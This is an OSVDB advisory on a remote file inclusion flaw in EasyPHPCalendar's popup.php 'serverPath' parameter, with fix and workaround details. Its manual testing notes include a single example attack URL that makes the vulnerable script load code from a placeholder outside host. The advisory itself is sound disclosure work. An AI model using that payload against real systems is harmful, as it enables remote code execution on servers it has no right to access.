EasyPHPCalendar popup.php serverPath Variable Remote File Inclusion

2005-07-05T07:06:57
ID OSVDB:17731
Type osvdb
Reporter Mafia_Boy()
Modified 2005-07-05T07:06:57

Description

Vulnerability Description

EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /functions/popup.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 6.2.8 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Set the "register_globals" PHP option to "Off".

Short Description

EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /functions/popup.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/calendar/functions/popup.php?serverPath=http://[target]/[remote code]

References:

Vendor URL: http://www.easyphpcalendar.com/ Secunia Advisory ID:15893 Related OSVDB ID: 17723 FrSIRT Advisory: ADV-2005-0959 CVE-2005-2155 Bugtraq ID: 14131